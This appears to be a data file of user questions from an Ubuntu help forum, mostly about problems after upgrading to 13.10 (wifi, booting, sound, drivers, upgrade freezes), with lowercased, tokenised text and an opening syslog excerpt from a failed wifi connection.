[ 909 ] : < info > activation ( wlan0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) oct 19 14:03:07 zircon kernel : [ 1911.667519 ] cfg80211 : regulatory domain changed to country : us oct 19 14:03:07 zircon kernel : [ 1911.667525 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) oct 19 14:03:07 zircon kernel : [ 1911.667530 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) oct 19 14:03:07 zircon kernel : [ 1911.667534 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) oct 19 14:03:07 zircon kernel : [ 1911.667538 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:07 zircon kernel : [ 1911.667541 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:07 zircon kernel : [ 1911.667545 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:07 zircon kernel : [ 1911.667548 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) oct 19 14:03:07 zircon kernel : [ 1911.667551 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > dhclient started with pid 8714 oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) beginning ip6 addrconf . oct 19 14:03:07 zircon avahi-daemon [ 944 ] : withdrawing address record for fe80 : :5604 : a6ff : fede : cbba on wlan0 . oct 19 14:03:07 zircon avahi-daemon [ 944 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :5604 : a6ff : fede : cbba . oct 19 14:03:07 zircon avahi-daemon [ 944 ] : interface wlan0.ipv6 no longer relevant for mdns . oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 3 of 5 ( ip configure start ) complete . oct 19 14:03:07 zircon dhclient : internet systems consortium dhcp client 4.2.4 oct 19 14:03:07 zircon dhclient : copyright 2004-2012 internet systems consortium . oct 19 14:03:07 zircon dhclient : all rights reserved . oct 19 14:03:07 zircon dhclient : for info , please visit https : //www.isc.org/software/dhcp/ oct 19 14:03:07 zircon dhclient : oct 19 14:03:07 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : dhcpv4 state changed nbi - > preinit oct 19 14:03:07 zircon dhclient : listening on lpf/wlan0/54:04 : a6 : de : cb : ba oct 19 14:03:07 zircon dhclient : sending on lpf/wlan0/54:04 : a6 : de : cb : ba oct 19 14:03:07 zircon dhclient : sending on socket/fallback oct 19 14:03:07 zircon dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 3 ( xid=0x6713caf2 ) oct 19 14:03:07 zircon kernel : [ 1911.918587 ] wlan0 : limiting tx power to 27 ( 27 - 0 ) dbm as advertised by 00:1f:33 : e9:99:8a oct 19 14:03:08 zircon avahi-daemon [ 944 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :5604 : a6ff : fede : cbba . oct 19 14:03:08 zircon avahi-daemon [ 944 ] : new relevant interface wlan0.ipv6 for mdns . oct 19 14:03:08 zircon avahi-daemon [ 944 ] : registering new address record for fe80 : :5604 : a6ff : fede : cbba on wlan0.* . oct 19 14:03:10 zircon dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 7 ( xid=0x6713caf2 ) oct 19 14:03:17 zircon dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 15 ( xid=0x6713caf2 ) oct 19 14:03:27 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . oct 19 14:03:27 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... oct 19 14:03:27 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... oct 19 14:03:27 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . oct 19 14:03:32 zircon dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 10 ( xid=0x6713caf2 ) oct 19 14:03:42 zircon dhclient : dhcpdiscover on wlan0 to 255.255.255.255 port 67 interval 14 ( xid=0x6713caf2 ) oct 19 14:03:52 zircon networkmanager [ 909 ] : < warn > ( wlan0 ) : dhcpv4 request timed out . oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 8714 oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) started ... oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > marking connection 'diamond ' invalid . oct 19 14:03:52 zircon networkmanager [ 909 ] : < warn > activation ( wlan0 ) failed for connection 'diamond' oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv4 configure timeout ) complete . oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] oct 19 14:03:52 zircon kernel : [ 1957.444402 ] wlan0 : deauthenticating from 00:1f:33 : e9:99:8a by local choice ( reason=3 ) oct 19 14:03:52 zircon wpa_supplicant [ 1415 ] : wlan0 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=3 oct 19 14:03:52 zircon networkmanager [ 909 ] : < info > ( wlan0 ) : supplicant interface state : completed - > disconnected oct 19 14:03:52 zircon kernel : [ 1957.468579 ] cfg80211 : calling crda to update world regulatory domain oct 19 14:03:52 zircon kernel : [ 1957.475397 ] cfg80211 : world regulatory domain updated : oct 19 14:03:52 zircon kernel : [ 1957.475404 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) oct 19 14:03:52 zircon kernel : [ 1957.475410 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:52 zircon kernel : [ 1957.475414 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:52 zircon kernel : [ 1957.475419 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:52 zircon kernel : [ 1957.475423 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) oct 19 14:03:52 zircon kernel : [ 1957.475427 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) anyone have any ideas ?
361497	update manager has managed to hang itself while updating ( 13.04 to 13.10 )	i was updating my ubuntu from 13.04 to 13.10 . all the packages were downloaded and were being installed , while all of a sudden the update manager window went dim . i ran ps -a and i can see a process called saucy however , how can i get my update manager to restart ? i am afraid that since my updates manager has already ( and possibly ) installed some of the packages , my installation might go kaput and i might have to start everything from zero . please help .
361499	wrong bootloader on restart	i have installed ubuntu on a partition of my hd after windows 8 . many installs of ubuntu before i could get it to work . 12.04 was working but keyboard and touchpad would often freeze requiring a reboot . the problem started when i upgraded to 13.04 . the problem is this : a restart of both windows and ubuntu end up using a grub that default to mint linux . a boot uses a grub that default to ubuntu or if i 've restored the mbr to windows . would appreciate help to resolve that problem without reformatting and losing everything .
361500	ubuntu 13.10 power option ?	i used to have ubuntu 13.04 but yesterday i upgraded to 13.10 . but i used to have power button at the upper right corner after time display , now its not there . it was like drop down menu . does anyone know how to bring it back ? . that button used to have shortcuts for suspend hibernate , sleep and others stuff .
361501	intel centrino wireless-n 130 bgn not working after installing ubuntu 13.10	i ca n't connect to my wifi after installing ubuntu 13.10 . i tried re-installing it three times ( thinking that i did something wrong during the installation ) but i still ca n't connect to my wifi . it just gives me the message that i 'm offline and that i ca n't connect to my wifi . i also tried connecting to the internet using lan cable but with the same results . i tried google but it seems that there 's no solution to this yet ... . anybody knows how to solve this ? h/w path device class description ====================================================== system rc530/rc730 ( to be filled by o.e.m . ) /0 bus rc530/rc730 /0/0 memory 64kib bios /0/4 processor intel ( r ) core ( tm ) i5-2410m cpu @ 2.30ghz /0/4/5 memory 32kib l1 cache /0/41 memory 4gib system memory /0/41/0 memory dimm [ empty ] /0/41/1 memory 4gib sodimm ddr3 synchronous 1333 mhz ( 0.8 ns ) /0/100 bridge 2nd generation core processor family dram controller 02:00.0 network controller : intel corporation centrino wireless-n 130 ( rev 34 ) subsystem : intel corporation centrino wireless-n 130 bgn flags : bus master , fast devsel , latency 0 , irq 44 memory at f7200000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : < access denied > kernel driver in use : iwlwifi kernel modules : iwlwifi 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) subsystem : samsung electronics co ltd device c0c1 flags : bus master , fast devsel , latency 0 , irq 41 i/o ports at b000 [ size=256 ] memory at f2104000 ( 64-bit , prefetchable ) [ size=4k ] memory at f2100000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8169 kernel modules : r8169
361502	add `` boot from frist hard drive '' to grub installed on usb	i have done a custom ubuntu 13.04 installation on a 8gb usb pendrive using a minimal cd install [ system root on /sda1 3.5gb ext4 , shared partition /sda2 ntfs 4gb mounted as /shared , no swap partition ] . it works just fine but it lacks a useful boot option : `` boot from first drive '' . on livecds you get that option which skips the livecd boot and restores the normal boot sequence as if the livecd was n't even there . i want to add that option to my usb installation as well because i often forgot the usb pendrive attached to my pc and it 's very nasty to restart the pc using the hard reset button ( not to mention also any faults that this can cause ) . a few people already suggested me to simply add another boot menuentry in grub.cfg like menuentry `` boot from first hard disk '' { set root= ( hd0,0 ) chainloader +1 } but this entry always looks for the first partition on the first hard drive . on my pc this is not the case as i have the os installed on hd ( 0,1 ) . other pcs instead might actually use hd ( 0,0 ) while others might as well use hd ( 1,4 ) or anything else . the point is , i ca n't just add an entry that uses a specific drive and partition . i need to add a menuentry that actually `` skips '' the grub2 bootloader from the usb pendrive and makes the boot sequence continue next , just like the usb pendrive was n't even there . can someone please tell me how can i do that ? i tried looking for a grub.cfg file on a livecd so i could copy the menuentry from there , but i found no grub.cfg in /boot/grub2 .
361503	nuvola player installation problems 13.10	so i 'm trying to install nuvola player on my laptop running ubuntu 13.10 . i follow the instructions on their website . pretty standard , add the repo , apt-get update , and then install . however , no matter how many times i add the ppa ubuntu ca n't find the package . these are the commands i run . sudo add-apt-repository ppa : nuvola-player-builders/stable sudo apt-get update sudo apt-get install nuvolaplayer i get a `` unable to locate package nuvolaplayer '' message . i know that is needs a new maintainer , but the ppa should still be active right ? anyway , any help would be appreciated , thanks .
361504	to enable wireless on thinkpad t440s	2 weeks after i bought t440s with windows 8 bundled , i 'm freaked out with it and want to replace with precise . using usb boot to make sure if it 's run although the device looks like already certified by canonical , ubuntu ca n't find wireless device . i 've found a workaround for a similar issue , i still do n't know what to do . the same url from above says : network intel corporation lynx point-lp pci express root port 6 ericsson business mobile networks bv unknown also , $ lsmod|grep intel : snd_hda_intel kvm_intel aesni_intel ghash_clmuni_intel , aesni_intel intel_ips i 'm not an expert at all with devices ... i 'd appreciate solution . thanks ! update ) i 'm required to use ubuntu 12.04 . update-2 ) i upgraded to 13.04 , hopelessly expecting that doing so would just resolve the issue . ended up seeing no improvement . i found the model of wireless module is intel wireless-n 7260 from this page .
361505	is it possible to upgrade ubuntu without installing the default package ?	i prefer chrome to firefox , and i removed firefox on ubuntu 12.04 . but when i upgraded to 12.10 , firefox got installed again ! what should i do to prevent installing firefox on upgrading the system ?
361506	restarting update manager after freezing !	while upgrading a distribution , the update manager freezes . how to restart the process of a safe upgrade ?
361508	is ubuntu 32bit limited to 4gigs of ram	ok i have a poweredge 2650 we are repurposing . since it does n't support 64bit : ( i have to use the 32bit . however i know windoze has the 4gig limitation . does 12.04 i386 ?
361510	ubuntu touch file download	have nexus 7 . last year installed unbuntu 13.04 does n't work locks up . now want to install the new phablet touch screen opened terminal , entered the command no access error . copy pasted the web url the page does not exist . so now how do i download the necessary image / files to install on my nexus . will the phablet o.s . automatically overwrite the previous ubuntu ? yes or no , how do i complete the install ?
361514	how to watch dvds in ubuntu 13.10 64-bit	i have ubuntu 13.10 64-bit and i am new to ubuntu , i noticed if i put a dvd into my dvd drive it will not play . is there something i can download that can let me watch dvds .
361516	alt+shift ca n't be set to toggle language	i recently did a fresh installation of ubuntu 13.10 ; but there is something bothering me , which i do n't quite understand . when i first tried to toggle the keyboard language ( i usually switch between persian and english ) using the good old `` alt+shift '' shortcut it did n't work . then , i went and checked the keyboard shortcut settings and found out that it had been set to `` super+space '' ( which btw did n't work either ) . so i tried to change it back to `` alt+shift '' but it just does n't work ; when i press `` alt+shift '' to set it up as the toggle-language shortcut , the box automatically resets itself to its previous value ( without any errors whatsoever ) . as far as i 've checked i could n't find any thing obvious corresponding to the shortcut `` alt+shift '' either . i 've currently set up the shortcut as `` ctrl+space '' ; so i can toggle the language . my question is why i can not set it up to just `` alt+shift '' ?
361518	can apparmor restrict interpreted languages ?	for interpreted/vm languages ( e.g . python , java , shell scripts ) can apparmor be set to only confine a particular script or program ? if so , how ?
361519	keyboard and mouse not functional at startup	i installed ubuntu over an xubuntu install , used the old home partition ( did n't format it ) and now at start up it takes 2-5 minutes for my keyboard and mouse to become functional . how can i fix this ?
361521	kubuntu never gets to the login screen	i am not sure if xorg is using the right device ... the system in question is an a4-1400 cpu with built-in radeon graphics . i added a pcie radeon hd 5750 , and changed the bios so it would use that card automatically . now it appears that i can see output from the tv plugged into the hdmi port , and boot into recovery mode , but can not get to a desktop - x does n't start . it just freezes at the kubuntu splash screen . i have no idea how to get x to use the proper graphics card . i pasted the xorg.log to http : //paste.ubuntu.com/6261137/ . and the xorg.conf generated by aticonfig -- initial is at http : //paste.ubuntu.com/6261161/ also , see lspci and lshw -c display outputs . i can provide more information , but something does tell me x is not using the right graphics card and i 've no idea where to begin how to fix it ... i faced a similar issue before with another distribution but found no information anywhere on how to make x use a specific graphics card . or maybe it 's not that simple .
361524	starting gui application in same window with xfce4 terminal running on i3	since recently i 'm enjoying the i3 tiled window manager . i did install the xfce4 terminal since it gives greater control over my terminal look and feel but i have noticed an issue with starting gui based applications . when i execute a gui based application i want it take over the current terminal window . to do this i use exec , as in : exec eclipse this will open a new window and leave the terminal i started the application in open as well . in normal circumstances this is not much of a problem since i can easily do an alt-w on the gui app 's window . however , for some applications , like a file manager , it is necessary to open in the same window . how can i make gui application open in the same window rather than opening a new one ?
361525	ubuntu 13.10 not detecting internal mic	i just upgraded to 13.10 from 13.04 , where my internal microphone worked fine . however , i can not get my internal mic to work now that i have upgraded . i use an acer aspire one 722 netbook . this used to happen in older versions , but was easily fixed by turning the mic off and then back on . this time that is n't so . thank you !
361529	/usr/src is eating up all inodes	it seems /usr/src ( apparently old kernels ) used up all my inodes : filesystem inodes iused ifree iuse % mounted on /dev/sda4 489600 489600 0 100 % / devtmpfs 219658 539 219119 1 % /dev none 219844 474 219370 1 % /run none 219844 3 219841 1 % /run/lock none 219844 8 219836 1 % /run/shm /dev/sda6 5963776 8361 5955415 1 % /home i tried everything to remove/purge , etc . the old kernels , without success . dpkg is not working anymore . i tried a few manual commands , but 12.04 gives me nothing . apt-get , etc . is not possible due to lack of space on the hard drive , which is not the problem obviously . however i can not install or remove anything ! i read a lot about users with the same problem , but their solutions are not working for me . please help . thanks a lot !
361530	high resolution ubuntu ?	this was posted some time ago , and i had n't heard of progress in this area - was hi-res gnome/unity/kde improved recently in 13.04/13.10 ? http : //www.omgubuntu.co.uk/2012/06/what-does-ubuntu-look-like-on-a-retina-display-bad are there any good workarounds for yoga 2 and other retina displays ?
361531	completely remove xfce from xubuntu 13.04 and install gnome	i do n't like unity in new ubuntu . so i download xubuntu for my laptop . now i do n't like xfce as well and i want gnome . how can i completely remove xfce from xubuntu 13.04 and install gnome 3.8 ?
361532	how to find available wireless networks	i 'm using an hp pavilion dv6000 i 've looked at other answers similar to this question how ever when i look at my network symbol it does n't say anything that the answer below says '' make sure that your wifi hardware switch is on or not . it is either f2 or f12 or near to it . once the switch is enabled , there is a small fan-like applet on the top panel ( gnome network manager ) , fourth from the right . click on it and if there is no tick mark on the option 'enable wireless ' , enable it . wait till your wifi connection name appears . '' it how says 'enable networking ' my wi-fi switch is on and i 've tried using terminal to kill the applet as another answer suggests trying . does anyone have any other ideas that might help ? just in case anybodies curious as to how i 'm posting this i 'm on my other ubuntu laptop that 's running an older version .
361534	upgrade to ubuntu 13.10 disabled track pad , brightness , sound on lenovo z570	i just upgraded to ubuntu 13.10 using ubuntu 's software update . it seemed to go all right , however after the system restarted and booted up ubuntu 13.10 , it began experiencing several problems . some of them were due to expected conflicts with the updated os , however right now i can not figure out why certain hardware functions are now `` broken '' and how to fix them . as far as i can tell , these are the sound ( permanently muted ) , mic ( picks up no sound ) , brightness ( set at maximum brightness regardless of using keyboard shortcuts or moving the screen brightness slider ) and trackpad ( mouse does not move , however plugged-in usb mouse does ) this sounds to me like a driver issue , however i can not figure out how to re-enable my drivers , re-install them , or whatever i have to do here . this did not happen durring my upgrades from 12.04 to 12.10 , or 12.10 to 13.04 , so i 'm at a total loss as to why this happened this time around . my computer is a lenovo z570 , dual-booting ubuntu and windows 7 from grub 2 . windows is working fine as far as i can tell .
361536	wifi network disappears after connecting	i just upgraded to ubuntu 13.10 , i did a fresh install , and now when i connect to my home wifi network , it disconnects me shortly after connecting , and then i can no longer see my network in the list of available connections . it was working perfectly under 13.04 , so im pretty certain that this is not an issue with my home network itself or my router . any suggestions ?
361537	13.10 login background without unity	i want to change my login screen background ( and keep the dots ) . but i upgraded to cinnamon 2.0 a day ago and then to 13.10 earlier today . i recently became aware of the issue with cinnamon 2.0 and unity on 13.10 . this normally would not matter to me since i use cinnamon instead but the only way i know of to change the login screen background is to change unity background . also all of my backgrounds are jpgs not pngs ( in case anyone was gon na say the replace /usr/share/backgrounds/ubuntu-warty.png ) and for some reason gimp has issues so converting them is not currently possible for me .
361541	i upgraded to 13.04 to 13.10 and received this error : filesystem check or mount failed	i upgraded to 13.04 to 13.10 and received this error : filesystem check or mount failed ? may someone help me ?
361542	when using unamplified audio i get no sound	the sound jumps at large lengths also when amplified , biggest problem is that if it 's not amplified i get no sound , so i am given a very small space to change my audio .
361543	installing ubuntu for galaxy nexus	how can i installing ubuntu for samsung galaxy nexus using windows platfrom dekstop ? did i must use linux based dekstop ?
361545	ubuntu 13.04 wi-fi issue	i am new to the ubuntu community , i ca n't access the internet through ethernet cable nor wireless on my mac mini 2012 late version , dual-booting ubuntu and os x .
361546	laptop takes a long time to boot after grub menu	i am running a asus r401vj laptop ( latin america version of n46vj ) that has a core i7 cpu and 8gb ram . after my grub menu , which is displayed for 2 seconds as i set it up , i 'm getting a black screen with a blinking white cursor that is increasing my boot time to about 60 seconds . after a while ubuntu runs fine , i just want to reduce my boot time . i do n't know if this has something to do with my never used nvidia 2gb geforce gt 635m graphics card . always when i tried to install the driver , i ended up with a ~600x800 screen resolution , and i fixed it by deleting a file called : xorg.conf from the /etc/x11/ directory , following a suggestion that i read in another forum . i would appreciate detailed answers , i 'm still new at ubuntu .
361547	ubuntu freezes/crash after wake when upgraded to 13.10	back on 13.04 it did n't occurred . i 've upgraded to 13.10 , systems apparently working fine , but , when i put it to sleep ( using or not using extended monitor ) and try to wake up , i see the screen ( both ) , without lock-screen , but completely freeze , neither tty open , nor the keyboard works . so , only option remains is to force shut-down . any clue how to investigate the cause or fix it ? thanks in advance , any info that 'll help you could ask ! ubuntu 13.10 x64 - not a fresh install/upgraded - with unity dell vostro 3550 amd proprietary drivers - 13.11 / hybrid with intel -- -- -- -- -- -- -- -- -- -- - edit -- -- -- -- -- -- -- -- -- -- -- -- the fix has gone , i cant wake from suspend again , and , every time i shutdown/power up , i got like 9 windows from `` report problem '' . this is the error :
361549	installing ubuntu on my tablet	i have a bsnl penta tablet with me . i want to know whether i can install ubuntu on this tablet or not . it has cortex a7 1 ghz processor , 1 gb ram , and 8gb internal storage .
361551	how do i get networking to work for a live usb ?	i 'm working on configuring a bootable live usb with ubuntu on it ( 13.04 to be specific ) that i can take with me anywhere and boot up on any pc with a standard bios and usb port , but i seem to be running into a problem ... the networking capabilities do n't always seem to work . i 'm guessing it has to do with not having the proper module available , but i 'm lost on how to best prepare against this . is there a way to install or provide just about any network and wireless module i can get my hands on ? relatively new to ubuntu , and much searching has n't seemed to yield an answer . any help here would be significantly appreciated .
361553	how can i validate if a 13.10 update was complete ?	i attempted to upgrade ubuntu 13.04 server to 13.10 tonight via the standard linux text console and it had some trouble . machine boots and displays 13.10 , but i am unsure exactly what or how much was successfully upgraded . is there some command i can run which will validate that all system has all standard binaries upgraded to the 13.10 release ? as for the issue ... . everything seemed to be going along ok until the screen displayed some kind of menu option regarding local edits to samba config file . there was a prompt requesting root password or ctrl-d to continue , but it would not take any input . from another terminal screen i tried killing the process displaying this samba message , and then some screen/screen processes . the hard drive activity picked up for a while and then all the processes on that pty were gone . as i said , reboot was ok , but i have no idea if everything was upgraded . the machine seems to be acting like normal , except that the upgrade killed my openpvn process which i 'll need to reload . thanks
361555	why opening a port is so difficult in ubuntu ?	i have searched around and i have run these commands iptables -a input -p tcp -d 0/0 -s 0/0 -- dport 5432 -j accept iptables-save > /etc/iptables.rules and i rebooted the box . i had no luck . what am i missing ? is there a universal way to do this thing in ubuntu ? i remember in fedora i just need to edit a text file and make it happen . thanks update i have run ufw allow 5432 and i ran ufw status i got this result status : active to action from -- -- -- -- -- -- 5432/tcp allow anywhere 80 allow anywhere 22 allow anywhere 5432 allow anywhere 5432/tcp allow anywhere ( v6 ) 80 allow anywhere ( v6 ) 22 allow anywhere ( v6 ) 5432 allow anywhere ( v6 ) i still can not access 5432 !
361560	wallpaper not rendered on ubuntu 13.04	i 'm experiencing an issue where there is a black background on ubuntu startup and whenever i open or close anything it leaves shadows on that black background . i 'm using compiz and a custom theme from here http : //www.noobslab.com/2013/05/mac-os-x-theme-for-ubuntu-1304-raring.html though reverting the theme to ubuntu 's default theme does n't solve this issue . also , surprisingly when i shutdown or lock my computer , it mysteriously shows the correct background image .
361562	is there anyway to upgrade from ubuntu 13.04 to 13.10 without deleting any files ?	i am thinking like in the android phone way , you upgrade your os but no files are gone . is there anyway to do that ? ?
361564	startup problems , 13.10 and 13.04	i 've run several previous ubuntu systems on the same eee pc with no problem . then switched to xfce for about a year , now am trying to switch back to see what 's new in ubuntu . on 13.04 and also 13.10 , i download on a mac , and did get the correct md5 , and did write and verify on a dvd-r sucessfully . both disks start to boot , but neither completes successfully . on 13.04 , pressing a function key while the system is trying to run from the dvd shows a screen of error messages . there are lots of them . this is my first time here so i ca n't post a picture , but they include : could not create certificate chroot : could not execute 'install ' : input/output error [ 3 times -- then further down on the screen , 3 times again ] and the same error 6 times with dpkg ( instead of install ) . should i order the dvds with ubuntu installed -- or is the problem probably elsewhere ? john
361568	no screens with usable configuration	i installed ubuntu 12.04 but it appears that there 's an issue with my screen . i am able to boot into recovery mode and access the terminal , and i was able to obtain the contents of xorg.conf ( http : //paste.ubuntu.com/6261683/ ) and xorg.0.log ( http : //paste.ubuntu.com/6261689/ ) . i have a dell xps13 l322x with integrated intel graphic card . please help me figure this out . i 've tried so many things from countless posts/forums , in vain . thanks ! : )
361570	where to find touchpad settings in ubuntu 13.10 ?	i upgraded to 13.10 yesterday and when i opened some website i found that the two-finger scrolling is off and i am back to edge scrolling . when i tried to fix it through the system settings i could n't find the touch pad settings . all i found was the mouse settings . a screen shot is attached . fyi , the touch pad is working fine . also attached a screen shot from dconf editor . my laptop is hp pavilion g4 .
361573	proxy authentication	i am very new to ubuntu , i decided to try it out two days ago . i am using proxy server [ 172.31.100.15 with user name and password ] . i cant access any on-line resources both with the terminal , transmission ( to download torrents ) , or ubuntu software center . for firefox , i have configured it and can download .deb and other files but need direct access . please give me step by step instruction as to how to configure and authenticate 12.04 terminal . thank you
361574	will it be possible to install ubuntu touch on the lanix s500 phone ?	i know that ubuntu touch is for nexus phones , but i checked the system requirements and my phone , and i want to know if ubuntu touch would be stable or should i wait for a version that supports different phones ?
361576	dual monitor display	i 'm using amd a-3500 with triple processors 2.1 ghz and i have 2 samsung displays with different resolutions . i 'm getting the right resolution on one ( which is a tv ) but do n't get the other ( 1366x687 ) . ho to sort it out ?
361577	i want to overwrite ubutu with windows	i recently installed ubuntu . while doing so i lost all my data . i tried testdisk but could recover only one drive . now i want to install windows , replacing ubuntu . i made a bootable usb and change boot order accordingly but when i selected a device to boot from it is showing windows 8 logo for a long time but not showing preparing , installing , which it is supposed to do so . help me soon . i immediately have to replace ubuntu .
361583	wine throwing errors since going to 13.10	after upgrading to ubuntu 13.10 , running any program in wine produces the following errors ( via cli ) : wine : unhandled page fault on read access to 0x00000000 at address ( nil ) ( thread 000f ) , starting debugger ... wine : unhandled page fault on read access to 0x00000000 at address ( nil ) ( thread 0014 ) , starting debugger ... wine client error:14 : write : bad file descriptor err : wineboot : start_services_process unexpected termination of services.exe - exit code -1073741819 ( these also generate two popup windows saying that an undefined application has crashed ) . after this , the program i was trying to run in the first place executes as normal . any idea how to fix this ?
361587	updating ubuntu touch on nexus 7	i am using ubuntu touch on my nexus 7 . i installed the stable release yesterday ( 18/10/2013 ) , using the command : sudo phablet-flash ubuntu-system -- no-backup this successfully installed the latest build on my nexus 7 . now when i type the following code in the terminal : sudo apt-get dist-upgrade i get the following error : w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . why is this so ? i am able to update using the system settings- > updates . what is wrong with this ?
361588	ubuntu 13.04 wifi not discovered	i first started using ubuntu at v13.04 last monday straight onto my new computer , it has only seen ubuntu . when i bought the desktop i also purchased a d-link dwa-123 model usb wifi adapter . it was discovered ( although very slow ) when using my live-cd to install ubuntu , however after installation it stopped all together . i then moved my desktop to the router and used ethernet to run updates and after these updates the wifi adapter was discovered again , however due to playing around with endless `` fix '' s all over the ask ubuntu forums i believe i may have mixed up some of the setting around for my drivers . when i start up my desktop my d-link adapter is undiscovered , after openning the terminal and using `` sudo modprobe rt2800usb '' it is discovered but is very slow and i have attempted to download games in steam and watching the download rate flat line for a few seconds then spike up to maybe 100-200kb/s then flat again . using my laptop at the same location running win7 i can download at a rate of 400kb/s+ actual download rate through steam , and the internet connection on it is fine . after having no luck with finding a fix i went out today and purchased a tp-link tl-wn823n usb wifi adapter . according to the ubuntu or linux compatability page ( do n't remember which one i was referencing ) all models around this one have been reviewed and have been supported for plug and play working at high speeds . i plug it into my desktop and it is undiscovered , i believe from all the forum scrolling i have done that it is a driver issue . as i said this is my first time running ubuntu and i am very much over this wifi problem ( also my sound is n't working , and i have gone into alsamixer and turned auto-mute off , but this is a secondary problem , need wifi working asap ) . i am not overly familiar with the terminal commands for ubuntu , so whoever reads this post and has help to offer may you please thoroughly explain what terminal commands etc . i should do to show drivers or make changes as you instruct . will be checking this constantly so will has fast replies and be so very grateful to anybody who can help me fix this . that is : 1 . get tp-link tl-wn823n usb detected and at high speed . 2 . if no chance of getting tp-link to work , fix d-link ( certain tp-link will be easier ) 3 . fix no-sound issue
361591	13.04 to 13.10 upgrade stalled at flashplugin-installer	13.04 to 13.10 upgrade stalled at flashplugin-installer some 5+ hours unsure how to proceed ? is there any way to skip this and move to the next step .. and deal with the flashpugin later ?
361592	ca n't boot from live usb of 13.10	i have windows 8.1 and ubuntu 13.04 installed now , for that i do n't have enough space for ubuntu to upgrade , i 'm thinking of install it into a larger section . so , like before , i use universal-usb-installer to build a usb from official 13.10 's iso . when i boot up and press f12 to select the usb drive to boot , then it just stucked at a blinking `` _ '' on the top left screen without anything else . it should be a try ubuntu or live cd or something like that screen to choose . i 'm running on thinkpad t410 , which does n't support uefi so i do n't think it 's related to it . i also tried changing the usb disk for three times , from ntfs to fat to fat32 , all failed . but there is a line of information ( some copy right ) on a black screen when i use a ntfs portable hard drive ... i also tried changing some bios options but it does n't help ... strangely i seem to find no similar issue like this on google , just found issues after the installation or when they could get the purple screen ...
361594	how to open a qcow2 file in ubuntu 13.04	i have cloudera-quickstart-vm-4.4.0-1-kvm.qcow2 file which i took from this site but i do n't know how to play the vm . could you please give me some hints or introduce me the proper tools ?
361598	how to replace lubuntu for ubuntu desktop ?	i know this may sound stupid , but i was having a problem with my ubuntu , it was n't loading . so i was googling solutions and one of them was purging something and installing something so i did it . the proccess took a couple hours , and it did n't work . it turns out it was something to do with my graphics card ( which i fixed ) , but when i loaded it up , i had lubuntu . is there any way of reverting back to ubuntu ? or is lubuntu better to keep ? i have no idea , please help .
